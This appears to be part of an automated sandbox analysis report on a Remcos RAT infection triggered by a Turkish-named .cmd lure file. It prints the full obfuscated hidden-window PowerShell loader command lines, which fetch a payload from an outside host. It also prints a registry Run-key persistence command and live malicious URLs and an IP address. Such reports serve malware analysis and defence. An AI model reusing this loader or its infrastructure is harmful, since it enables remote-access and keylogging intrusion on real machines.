              Source: wab.exe, 0000000F.00000003.2220389190.00000000059CD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.2208059166.00000000059CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.duelvalenza.it/eU
              Source: wab.exe, 0000000F.00000003.2208059166.00000000059CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.duelvalenza.it/nkF
              Source: wab.exe, 0000000F.00000003.2208059166.00000000059CD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.2220370209.0000000005A0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.duelvalenza.it/wnnSAFMWPwDXGy95.bin
              Source: wab.exe, 0000000F.00000003.2220389190.00000000059CD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.2885259023.0000000005959000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.duelvalenza.it/wnnSAFMWPwDXGy95.bin/
              Source: wab.exe, 0000000F.00000002.2885259023.0000000005959000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.duelvalenza.it/wnnSAFMWPwDXGy95.bin3
              Source: wab.exe, 0000000F.00000003.2208059166.0000000005A0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.duelvalenza.it/wnnSAFMWPwDXGy95.binI
              Source: wab.exe, 0000000F.00000002.2885259023.0000000005959000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.duelvalenza.it/wnnSAFMWPwDXGy95.binM
              Source: powershell.exe, 00000002.00000002.2384493968.00000210ACC91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000005.00000002.2276376367.00000000050B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000005.00000002.2304485459.000000000611D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000005.00000002.2304485459.000000000611D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000005.00000002.2304485459.000000000611D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: wab.exe, 0000000F.00000002.2885259023.0000000005996000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duelvalenza.it/
              Source: wab.exe, 0000000F.00000002.2885259023.0000000005959000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.2895270000.0000000021010000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://duelvalenza.it/wnnSAFMWPwDXGy95.bin
              Source: wab.exe, 0000000F.00000002.2885259023.0000000005959000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duelvalenza.it/wnnSAFMWPwDXGy95.binKJ
              Source: wab.exe, 0000000F.00000002.2895270000.0000000021010000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://duelvalenza.it/wnnSAFMWPwDXGy95.binhttp://87.121.105.163/wnnSAFMWPwDXGy95.bin
              Source: svchost.exe, 00000008.00000003.1828316936.000002087CAE2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
              Source: edb.log.8.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
              Source: edb.log.8.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
              Source: edb.log.8.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
              Source: svchost.exe, 00000008.00000003.1828316936.000002087CAE2000.00000004.00000800.00020000.00000000.sdmp, edb.log.8.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
              Source: powershell.exe, 00000005.00000002.2276376367.000000000520B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2306982846.0000000007A69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.2384493968.00000210AE111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000002.00000002.2497877400.00000210BCD05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2304485459.000000000611D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: svchost.exe, 00000008.00000003.1828316936.000002087CAE2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
              Source: edb.log.8.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
              Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 46.254.34.12:443 -> 192.168.2.4:49747 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.4:49750 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Installs a global keyboard hook
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exeJump to behavior

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0000000F.00000002.2885259023.0000000005996000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 8872, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\mvourhjs.dat, type: DROPPED

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: amsi64_7504.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: amsi32_7752.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7504, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7752, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Very long command line found
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 5868
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 5892
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 5868Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 5892Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_0495404F LdrInitializeThunk,Sleep,NtProtectVirtualMemory,LdrInitializeThunk,15_2_0495404F
              Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BA0CED62_2_00007FFD9BA0CED6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BA0DC822_2_00007FFD9BA0DC82
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Stagenes" /t REG_EXPAND_SZ /d "%Frihjulets% -w 1 $Gyps224=(Get-ItemProperty -Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224)"
              Source: amsi64_7504.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: amsi32_7752.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7504, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7752, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.spyw.evad.winCMD@43/15@11/10
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Pleurothotonus.DilJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8956:120:WilError_03
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\jnbcourg-8XH6PE
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7456:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7512:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5x5u0sid.ubx.ps1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7504
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7752
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
              Source: Teklif talebi BAKVENTA-BAKUUsurpationens.cmdVirustotal: Detection: 9%
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Teklif talebi BAKVENTA-BAKUUsurpationens.cmd" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Nabolandenes = 1;$Kapsle='S';$Kapsle+='ubstrin';$Kapsle+='g';Function Handig($Fyldepenneblkket){$Bytteforholdet=$Fyldepenneblkket.Length-$Nabolandenes;For($Columbaries=4; $Columbaries -lt $Bytteforholdet; $Columbaries+=(5)){$Festskriftets+=$Fyldepenneblkket.$Kapsle.Invoke( $Columbaries, $Nabolandenes);}$Festskriftets;}function Xerotherm($Drapers){& ($Normalprisen) ($Drapers);}$Palmehavers=Handig 'K njMResaoAfstznedsiFestl urlFokuaUnr /half5Re,u. Unb0bld Tan(PostWFrekiSpeenGarddv,cioInf.wSings Hea BracN RoqTL.at Babo1D,mi0Qq.a.Sten0Prop;Thec DefiWNonciEtagnOpry6Amel4Topc;Gela HetzxIndk6Comp4F.rt;Bill Erhvr Denv N.n:.syc1Basi2sdsu1ge t.Jens0 Spa)Prim UnboGStameSleec,fskkLovloMain/ .om2Nulp0Carb1F rr0Reor0Offi1.ykk0Ahis1Tffe TreF Twoiunwrr DiseSvrdfGattos,rix Ibr/Poli1Far.2Dump1 As .Enhy0Thus ';$Nysseliges=Handig ',undU Eges ignesnotr Ins-AlbuA,lleg,useeUpstnIsoitAnni ';$Fordommes=Handig ' odeh ZigtGacatJ,jup Fl,:.ent/B gg/ lor8Aden7Tors.Do.m1Mult2 Und1dy,n.unbr1cute0 Reg5Appl.Mast1 ic6A mb3Dete/FiltTUnexeKonsrwa.smAut.i rovnSka.aStocl PatjBipaoTigebD sk.OvertMetaoEkspcRhab ';$Problemanalysernes=Handig 'Uro.>Fe.l ';$Normalprisen=Handig 'Mic.iSkaaeRegex Str ';$Schizophasia='Heterozygotes';Xerotherm (Handig 'UndeSRegoePas.tDehu- Je C Stio UnsnGeomtUnteeTalln Re.tSpir Stil-BeatPImpra StetplurhSl.g Ko,mT H.b:Part\Sp,nK.also,mpir AlysNitre W mtSemisMonr.T.att Ch xs,nstDisp ,fsk-FuglV La,aTipslSkaruLa,se Bo lr t$ uscSMisac HydhR.kei looz KigoRep.pLderhAcicaDisrsAppeiAggra,rro;Ge e ');Xerotherm (Handig ' S,pi Chef ,or Labr(AaletFacoe TorsDub tindk- StrpMalaaHeavtTi.eh,ndi H neT Li.:sp l\DemoKAbsooRekorMenisA.foeUnsctUn es.eta.UnibtBentx Adet A.s)Kvin{eksae Pasx,oeci RentEqua} Fer;trop ');$Wedeln = Handig 'NonmedemycBedeh iewoFor edan%kon.al,plpFarmpMakedAra aWoodtBisuaRaft% Gen\Ma,ePRikslTilleSpaau oodrFun.oSenstForbhC.mpoLys,t Tito Ca nUnblu Ma,sAmer.ImprDDistiDi,il Las Gara&Post&Staf C,loeF.tocGennhFangoChi, Tor$Over ';Xerotherm (Handig 'tore$ mangOthilTriloUnstbTr,na.aval ove:paabSOpt.w EngeDir.eLus pAntryT pe=Gaze(S ecc StrmPnhedUdda Fejl/,avlcPr t Utl$,agsWTrine,ilbd DydeFly.lTy.inKar.)Plat ');Xerotherm (Handig 'Pr s$BriegStral ,odoNo,ib ,ndaIntelSu.e:FacoD CleeDo.ab PriaNarktbeeftKonte VaraBramtUds.rCam eIc.nn StoeUtths Reu=Tall$PlamFAn.no F rrStradc.iboDisgmNstemIns,eKlarsCali.Pr bsdetepKr,vlReaciSangt Urf(Gill$TeisP Sk.rE spoPrombB tol DomeCuttmT,lda.allnRhamaJordlopryyPicksWo keArtsrBox.n PrleA,etsAfsp)Slad ');$Fordommes=$Debatteatrenes[0];Xerotherm (Handig ' era$Leucg irklSpeeoF.nabEncaaBal,lCent:B atUStj.rOplaeAmphtGeore f arSouroBagggfor.r ephaLoc.pA sehBars=AlfaN redeKaglwBlyg- accO AntbForlj BoneUgudcAntetDiff LogaSPulvyKonfs A btBilleN,dumMikr.AtomNSysteHetetM.ni.,andWMarke.ussb Si.CS lvlPh.ni P,ceNondnQuintOpsp ');Xerotherm (Handig 'Spin$,jouUBehjrAnt,eTro,tAfstebrikrI.dsoArbegSupprAdgaaReflp Ambh Ec..ToplHGlobeS,beaBedudgrateMor.
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Pleurothotonus.Dil && echo $"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Nabolandenes = 1;$Kapsle='S';$Kapsle+='ubstrin';$Kapsle+='g';Function Handig($Fyldepenneblkket){$Bytteforholdet=$Fyldepenneblkket.Length-$Nabolandenes;For($Columbaries=4; $Columbaries -lt $Bytteforholdet; $Columbaries+=(5)){$Festskriftets+=$Fyldepenneblkket.$Kapsle.Invoke( $Columbaries, $Nabolandenes);}$Festskriftets;}function Xerotherm($Drapers){& ($Normalprisen) ($Drapers);}$Palmehavers=Handig 'K njMResaoAfstznedsiFestl urlFokuaUnr /half5Re,u. Unb0bld Tan(PostWFrekiSpeenGarddv,cioInf.wSings Hea BracN RoqTL.at Babo1D,mi0Qq.a.Sten0Prop;Thec DefiWNonciEtagnOpry6Amel4Topc;Gela HetzxIndk6Comp4F.rt;Bill Erhvr Denv N.n:.syc1Basi2sdsu1ge t.Jens0 Spa)Prim UnboGStameSleec,fskkLovloMain/ .om2Nulp0Carb1F rr0Reor0Offi1.ykk0Ahis1Tffe TreF Twoiunwrr DiseSvrdfGattos,rix Ibr/Poli1Far.2Dump1 As .Enhy0Thus ';$Nysseliges=Handig ',undU Eges ignesnotr Ins-AlbuA,lleg,useeUpstnIsoitAnni ';$Fordommes=Handig ' odeh ZigtGacatJ,jup Fl,:.ent/B gg/ lor8Aden7Tors.Do.m1Mult2 Und1dy,n.unbr1cute0 Reg5Appl.Mast1 ic6A mb3Dete/FiltTUnexeKonsrwa.smAut.i rovnSka.aStocl PatjBipaoTigebD sk.OvertMetaoEkspcRhab ';$Problemanalysernes=Handig 'Uro.>Fe.l ';$Normalprisen=Handig 'Mic.iSkaaeRegex Str ';$Schizophasia='Heterozygotes';Xerotherm (Handig 'UndeSRegoePas.tDehu- Je C Stio UnsnGeomtUnteeTalln Re.tSpir Stil-BeatPImpra StetplurhSl.g Ko,mT H.b:Part\Sp,nK.also,mpir AlysNitre W mtSemisMonr.T.att Ch xs,nstDisp ,fsk-FuglV La,aTipslSkaruLa,se Bo lr t$ uscSMisac HydhR.kei looz KigoRep.pLderhAcicaDisrsAppeiAggra,rro;Ge e ');Xerotherm (Handig ' S,pi Chef ,or Labr(AaletFacoe TorsDub tindk- StrpMalaaHeavtTi.eh,ndi H neT Li.:sp l\DemoKAbsooRekorMenisA.foeUnsctUn es.eta.UnibtBentx Adet A.s)Kvin{eksae Pasx,oeci RentEqua} Fer;trop ');$Wedeln = Handig 'NonmedemycBedeh iewoFor edan%kon.al,plpFarmpMakedAra aWoodtBisuaRaft% Gen\Ma,ePRikslTilleSpaau oodrFun.oSenstForbhC.mpoLys,t Tito Ca nUnblu Ma,sAmer.ImprDDistiDi,il Las Gara&Post&Staf C,loeF.tocGennhFangoChi, Tor$Over ';Xerotherm (Handig 'tore$ mangOthilTriloUnstbTr,na.aval ove:paabSOpt.w EngeDir.eLus pAntryT pe=Gaze(S ecc StrmPnhedUdda Fejl/,avlcPr t Utl$,agsWTrine,ilbd DydeFly.lTy.inKar.)Plat ');Xerotherm (Handig 'Pr s$BriegStral ,odoNo,ib ,ndaIntelSu.e:FacoD CleeDo.ab PriaNarktbeeftKonte VaraBramtUds.rCam eIc.nn StoeUtths Reu=Tall$PlamFAn.no F rrStradc.iboDisgmNstemIns,eKlarsCali.Pr bsdetepKr,vlReaciSangt Urf(Gill$TeisP Sk.rE spoPrombB tol DomeCuttmT,lda.allnRhamaJordlopryyPicksWo keArtsrBox.n PrleA,etsAfsp)Slad ');$Fordommes=$Debatteatrenes[0];Xerotherm (Handig ' era$Leucg irklSpeeoF.nabEncaaBal,lCent:B atUStj.rOplaeAmphtGeore f arSouroBagggfor.r ephaLoc.pA sehBars=AlfaN redeKaglwBlyg- accO AntbForlj BoneUgudcAntetDiff LogaSPulvyKonfs A btBilleN,dumMikr.AtomNSysteHetetM.ni.,andWMarke.ussb Si.CS lvlPh.ni P,ceNondnQuintOpsp ');Xerotherm (Handig 'Spin$,jouUBehjrAnt,eTro,tAfstebrikrI.dsoArbegSupprAdgaaReflp Ambh Ec..ToplH
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://%3cfnc1%3e(79)/
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Pleurothotonus.Dil && echo $"
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1888,i,9343559299430913976,12874712062366799984,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://%3cfnc1%3e(79)/
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2024 --field-trial-handle=1968,i,3232856823138323663,3674453500036115141,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Stagenes" /t REG_EXPAND_SZ /d "%Frihjulets% -w 1 $Gyps224=(Get-ItemProperty -Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224)"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Stagenes" /t REG_EXPAND_SZ /d "%Frihjulets% -w 1 $Gyps224=(Get-ItemProperty -Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224)"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Nabolandenes = 1;$Kapsle='S';$Kapsle+='ubstrin';$Kapsle+='g';Function Handig($Fyldepenneblkket){$Bytteforholdet=$Fyldepenneblkket.Length-$Nabolandenes;For($Columbaries=4; $Columbaries -lt $Bytteforholdet; $Columbaries+=(5)){$Festskriftets+=$Fyldepenneblkket.$Kapsle.Invoke( $Columbaries, $Nabolandenes);}$Festskriftets;}function Xerotherm($Drapers){& ($Normalprisen) ($Drapers);}$Palmehavers=Handig 'K njMResaoAfstznedsiFestl urlFokuaUnr /half5Re,u. Unb0bld Tan(PostWFrekiSpeenGarddv,cioInf.wSings Hea BracN RoqTL.at Babo1D,mi0Qq.a.Sten0Prop;Thec DefiWNonciEtagnOpry6Amel4Topc;Gela HetzxIndk6Comp4F.rt;Bill Erhvr Denv N.n:.syc1Basi2sdsu1ge t.Jens0 Spa)Prim UnboGStameSleec,fskkLovloMain/ .om2Nulp0Carb1F rr0Reor0Offi1.ykk0Ahis1Tffe TreF Twoiunwrr DiseSvrdfGattos,rix Ibr/Poli1Far.2Dump1 As .Enhy0Thus ';$Nysseliges=Handig ',undU Eges ignesnotr Ins-AlbuA,lleg,useeUpstnIsoitAnni ';$Fordommes=Handig ' odeh ZigtGacatJ,jup Fl,:.ent/B gg/ lor8Aden7Tors.Do.m1Mult2 Und1dy,n.unbr1cute0 Reg5Appl.Mast1 ic6A mb3Dete/FiltTUnexeKonsrwa.smAut.i rovnSka.aStocl PatjBipaoTigebD sk.OvertMetaoEkspcRhab ';$Problemanalysernes=Handig 'Uro.>Fe.l ';$Normalprisen=Handig 'Mic.iSkaaeRegex Str ';$Schizophasia='Heterozygotes';Xerotherm (Handig 'UndeSRegoePas.tDehu- Je C Stio UnsnGeomtUnteeTalln Re.tSpir Stil-BeatPImpra StetplurhSl.g Ko,mT H.b:Part\Sp,nK.also,mpir AlysNitre W mtSemisMonr.T.att Ch xs,nstDisp ,fsk-FuglV La,aTipslSkaruLa,se Bo lr t$ uscSMisac HydhR.kei looz KigoRep.pLderhAcicaDisrsAppeiAggra,rro;Ge e ');Xerotherm (Handig ' S,pi Chef ,or Labr(AaletFacoe TorsDub tindk- StrpMalaaHeavtTi.eh,ndi H neT Li.:sp l\DemoKAbsooRekorMenisA.foeUnsctUn es.eta.UnibtBentx Adet A.s)Kvin{eksae Pasx,oeci RentEqua} Fer;trop ');$Wedeln = Handig 'NonmedemycBedeh iewoFor edan%kon.al,plpFarmpMakedAra aWoodtBisuaRaft% Gen\Ma,ePRikslTilleSpaau oodrFun.oSenstForbhC.mpoLys,t Tito Ca nUnblu Ma,sAmer.ImprDDistiDi,il Las Gara&Post&Staf C,loeF.tocGennhFangoChi, Tor$Over ';Xerotherm (Handig 'tore$ mangOthilTriloUnstbTr,na.aval ove:paabSOpt.w EngeDir.eLus pAntryT pe=Gaze(S ecc StrmPnhedUdda Fejl/,avlcPr t Utl$,agsWTrine,ilbd DydeFly.lTy.inKar.)Plat ');Xerotherm (Handig 'Pr s$BriegStral ,odoNo,ib ,ndaIntelSu.e:FacoD CleeDo.ab PriaNarktbeeftKonte VaraBramtUds.rCam eIc.nn StoeUtths Reu=Tall$PlamFAn.no F rrStradc.iboDisgmNstemIns,eKlarsCali.Pr bsdetepKr,vlReaciSangt Urf(Gill$TeisP Sk.rE spoPrombB tol DomeCuttmT,lda.allnRhamaJordlopryyPicksWo keArtsrBox.n PrleA,etsAfsp)Slad ');$Fordommes=$Debatteatrenes[0];Xerotherm (Handig ' era$Leucg irklSpeeoF.nabEncaaBal,lCent:B atUStj.rOplaeAmphtGeore f arSouroBagggfor.r ephaLoc.pA sehBars=AlfaN redeKaglwBlyg- accO AntbForlj BoneUgudcAntetDiff LogaSPulvyKonfs A btBilleN,dumMikr.AtomNSysteHetetM.ni.,andWMarke.ussb Si.CS lvlPh.ni P,ceNondnQuintOpsp ');Xerotherm (Handig 'Spin$,jouUBehjrAnt,eTro,tAfstebrikrI.dsoArbegSupprAdgaaReflp Ambh Ec..ToplHGlobeS,beaBedudgrateMor.Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Pleurothotonus.Dil && echo $"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Nabolandenes = 1;$Kapsle='S';$Kapsle+='ubstrin';$Kapsle+='g';Function Handig($Fyldepenneblkket){$Bytteforholdet=$Fyldepenneblkket.Length-$Nabolandenes;For($Columbaries=4; $Columbaries -lt $Bytteforholdet; $Columbaries+=(5)){$Festskriftets+=$Fyldepenneblkket.$Kapsle.Invoke( $Columbaries, $Nabolandenes);}$Festskriftets;}function Xerotherm($Drapers){& ($Normalprisen) ($Drapers);}$Palmehavers=Handig 'K njMResaoAfstznedsiFestl urlFokuaUnr /half5Re,u. Unb0bld Tan(PostWFrekiSpeenGarddv,cioInf.wSings Hea BracN RoqTL.at Babo1D,mi0Qq.a.Sten0Prop;Thec DefiWNonciEtagnOpry6Amel4Topc;Gela HetzxIndk6Comp4F.rt;Bill Erhvr Denv N.n:.syc1Basi2sdsu1ge t.Jens0 Spa)Prim UnboGStameSleec,fskkLovloMain/ .om2Nulp0Carb1F rr0Reor0Offi1.ykk0Ahis1Tffe TreF Twoiunwrr DiseSvrdfGattos,rix Ibr/Poli1Far.2Dump1 As .Enhy0Thus ';$Nysseliges=Handig ',undU Eges ignesnotr Ins-AlbuA,lleg,useeUpstnIsoitAnni ';$Fordommes=Handig ' odeh ZigtGacatJ,jup Fl,:.ent/B gg/ lor8Aden7Tors.Do.m1Mult2 Und1dy,n.unbr1cute0 Reg5Appl.Mast1 ic6A mb3Dete/FiltTUnexeKonsrwa.smAut.i rovnSka.aStocl PatjBipaoTigebD sk.OvertMetaoEkspcRhab ';$Problemanalysernes=Handig 'Uro.>Fe.l ';$Normalprisen=Handig 'Mic.iSkaaeRegex Str ';$Schizophasia='Heterozygotes';Xerotherm (Handig 'UndeSRegoePas.tDehu- Je C Stio UnsnGeomtUnteeTalln Re.tSpir Stil-BeatPImpra StetplurhSl.g Ko,mT H.b:Part\Sp,nK.also,mpir AlysNitre W 